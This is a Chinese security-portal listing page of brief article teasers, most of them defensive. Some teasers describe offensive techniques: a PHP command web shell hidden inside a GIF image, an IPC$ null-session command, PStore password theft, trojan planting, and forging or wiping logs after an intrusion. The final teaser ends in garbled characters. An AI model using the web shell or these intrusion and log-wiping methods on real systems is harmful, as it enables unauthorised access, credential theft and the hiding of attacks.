IT168首页 | 产品报价 | ChinaUnix社区 | ITPUB社区 | 文库 | 博客 | 自测 | 专题 | ITPUB学院

内网安全管理

防火墙可分为几种不同的安全等级。在Linux中,由于有许多不同的防火墙软件可供选择,安全性可低可高, 最复杂的软件可提供几乎无法渗透的保护能力。不过,Linux核心本身内建了一种称作“伪装”的简单机制,除了最专门的黑客攻击外,可以抵挡住绝大部分的攻击行动。      当我们拨号连接Internet后,我们的计算机会被

27日更新
用Linux防火墙伪装抵住黑客攻击

1.简介:什么是PStore?  PStore的全称为:Protected Storage。在系统服务中我们可以看到它(9x没有)。它的作用就是为应用程序的安全保存做一个接口。在它里面记录了一些隐密的信息,比方说:  1. Outlook 密码  2. 删除的Outlook帐号密码  3. IE 密码保存站点密码  4. MSN登陆密码  5. IE 自动保存密码    

27日更新
攻击新方法:利用PStore接口获取帐号信息

一,怎样建立空连接,它有什么用?   答:使用命令 net use \\IP\ipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。   对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,

27日更新
IPC$常见问题与解答

相信很多朋友都听说过木马程序,总觉得它很神秘、很高难,但事实上随着木马软件的智能化,很多骇客都能轻松达到攻击的目的。今天,笔者就以最新的一款木马程序——黑洞2004,从种植、使用、隐藏、防范四个方面来为网络爱好者介绍一下木马的特性。需要提醒大家的是,在使用木马程序的时候,请先关闭系统中的病毒防火墙,因为

27日更新
注意:黑客种植木马的方法及防范策略

C:\>copy 1.gif+2.php 3.gif     上面一句的意思是把1.gif和2.php头尾相接生成一个新文件3.gif。2.php是我自己写的一个cmdphpshell文件(安全模式关闭),代码如下:     <?$cmd=$_POST[''cmd''];@system ($cmd);?>     然后在一个wfw.php中加上这么一句:     <?include("3.gif");?>   

27日更新
攻击方法:脚本后门注入图片新方法

日志对于系统安全的作用是显而易见的,无论是网络管理员还是黑客都非常重视日志,一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能,而一个聪明的黑客往往会在入侵成功后迅速清除掉对自己不利的日志。下面我们就来讨论一下日志的安全和创建问题。   一:概述:Windows2000的系统日志文件有应用程序日志,安全

27日更新
如何伪造日志文件

对于大部分读者来讲,都或多或少地了解Flash跨站脚本漏 洞及其攻击方法,这确实是一个 很普遍的漏洞,有必要详细的为 大家说下如何防范!    基本的防范主要有以下几点:  第一;比较普遍的就是去 掉Flash动画的插入。去掉的方 法很简单,以动网为例,在 BBS的目录下的TNC下的getubb.asp里,最下面有一段代码,把Flash

27日更新
跨站脚本之防范未然

青海网络系统是以数据通信为基础的计算机综合信息网,实现了信息通信和资源共享,面向社会提供网络服务和信息服务。但是,随着企业电子商务和个人网络应用的发展,作为一个公共网络平台,青海IP网面临着如何保护企业和用户秘密,维护企业和用户一系列合法权益等一系列重要而棘手的问题。一、 青海省IP网络系统安全问题分析

27日更新
青海省IP网优化工程网络安全解决方案

为什么密码位数短的MD5不安全?  一个长度为4的纯小写字母生成的密码在数据库的帮助下可以在0.005s内被破解。这个时间还包括了连接数据库的时间,运行的环境是在我900MHZ的个人PC上。    注意,我们要讨论的是一种破解密码的思维,而不提供一种具体的方法。如果你的希望和我们不一致,那么后边将不是你所需要的内容了

27日更新
数据库的新作用 利用数据库来破解md5

第一部分 SYN Flood的基本原理   SYN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻击方资源耗 尽(CPU满负荷或内存不足)的攻击方式。   要明白这种攻击的基本原理,还是要从TCP连接建立的过程开始说起:   大

27日更新
SYN Flood 攻击的基本原理及防御

对于一个复杂的多层结构的系统和网络安全规划来说,隐患扫描是一项重要的组成元素。隐患扫描能够模拟黑客的行为,对系统设置进行攻击测试,以帮助管理员在黑客攻击之前,找出网络中存在的漏洞。这样的工具可以远程评估你的网络的安全级别,并生成评估报告,提供相应的整改措施。  目前,市场上有很多隐患扫描工具,按照不

27日更新
新手上路:如何选择漏洞扫描工具

当前,很多运营商都会对异常流量攻击这种事情很头疼,这是电信领域面临的一个严峻的挑战。电信运营商应当构建异常流量的防范体系。做好防范工作是电信运营商内部的一个重要工作,也需要政府的支持和业界的合作。 IP网络的安全挑战 IP网络现在面临的安全挑战,第一个就是大规模的流量攻击。攻击流量规模化对目前网络的影响非

27日更新
有关电信IP网如何防范异常流量详细介绍

随着网络威胁的频率、范围和复杂度的日益增长,先进全面的安全工具包成为必不可少的工具。在安全策略、服务产品和网络性能之间权衡利弊的传统方式已不能满足需求。IDC Asia 2003年5月的调查报告指出,网络安全已经成为亚洲IT经理人最关心的问题,它的重要程度已经排在管理,带宽以及费用支出等问题之前,而且亚洲各国在保护

27日更新
Juniper J-Protect网络安全综合解决方案

概论     先简单介绍无线网络的扑拓。无线网络有两个主要的组成部件:基站和网络桥接器[stations(STA)and access points(AP)].存在有[adhoc(peertopeer)and infrastructure mode]两种无线网络操作模式.在[the adhoc mode]模式下客户端(STA)与客户端之间可以在网络内直接通信,无需透过Access Point。在[the infrastruct

27日更新
有关无线安全与黑客的话题

第一招:屏幕保护    在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护

27日更新
防范非法用户侵入 Win 2000/XP系统“七招”

本文关键字:IP网络  密钥加密术是确保具有报文解密密钥的受限方对信息公开的网络技术安全技术。 在密钥加密模式中,只需要提供一种密钥进行加、解密过程。它又叫作对称密钥加密。“非对称密钥加密”主要应用于需要一组公共/私人密钥的系统:报文加密时使用一种密钥,解密时使用另一种密钥。 密钥出现的格式有多种,如代码

27日更新
密钥或对称密钥加密术

由于HTTP协议是基于请求/响应范式的(相当于客户机/服务器)。一个客户机与服务器建立连接后,发送一个请求给服务器,请求方式的格式为:统一资源标识符(URL)、协议版本号,后边是MIME信息包括请求修饰符、客户机信息和可能的内容。服务器接到请求后,给予相应的响应信息,其格式为一个状态行,包括信息的协议版本号、一个

27日更新
利用HTTP进行拒绝服务攻击的一些构思

如何能成为一位Hacker?这是很多刚学习入侵的朋友经常会问起的问题。希望下面的文章能够给大家减少一些麻烦。   在开始学习之前,我先声明一点,下面的文章仅供大家做技术参考,请各位不要用在非法的地方!     一、工具选择   没有工具想入侵恐怕是很难的。既然Hacker的前辈已经留下了一大笔“财富”,我们这样的

27日更新
入侵技术从零开始——《入侵入门》

被扫的主机:192.xxx.xx.x  主机IP数:4  发现的安全漏洞:7个  安全弱点:45个  系统: Standard: Solaris 2.x, Linux 2.1.???, Linux 2.2, MacOS    Telnet (23/tcp)   ssh (22/tcp)   ftp (21/tcp) (发现安全漏洞)   netstat (15/tcp)   daytime (13/tcp)   systat (11/tcp)   echo (7/tcp)  

27日更新
入侵前,了解端口用途

网络上有很多不同的日志清除程序,其中最好的是zap2。我编译后称为z2  在你获得root的访问权后立即运行z2这个程序。这个程序执行的非常快。  你可以使用finger @host.xxx来查看当前有说锹剂耍邢腹鄄煲幌聄oot或admin的idle time(空闲时间)  来猜测他们是否离开主机了。  Login, ?ú????oóá¢?′ê?è?wà′2é?

27日更新
进入系统后如何隐藏自已
金秋十月 与你饮酒论道
热门文章
it168文库会议频道上线

热门标签

热点推荐